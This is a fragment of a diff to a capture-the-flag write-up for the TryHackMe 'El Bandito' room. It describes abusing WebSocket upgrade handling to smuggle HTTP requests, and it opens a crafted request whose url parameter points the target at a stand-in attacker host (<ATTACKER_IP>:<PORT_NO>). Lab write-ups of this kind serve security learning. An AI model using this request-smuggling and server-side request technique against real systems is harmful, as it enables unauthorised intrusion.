Jebin123Rufus/Red-Teaming-Writeups/THM-Hard/EL-Bandito.md

 The supplied argument specifies the listening port for the malicious server.

-The objective was to abuse the backend's handling of WebSocket upgrade requests and smuggle additional HTTP requests through the connection.

-A crafted request was sent through Burp Repeater:
+A crafted request was then sent through Burp Repeater:

 ```http
 GET /isOnline?url=http://<ATTACKER_IP>:<PORT_NO> HTTP/1.1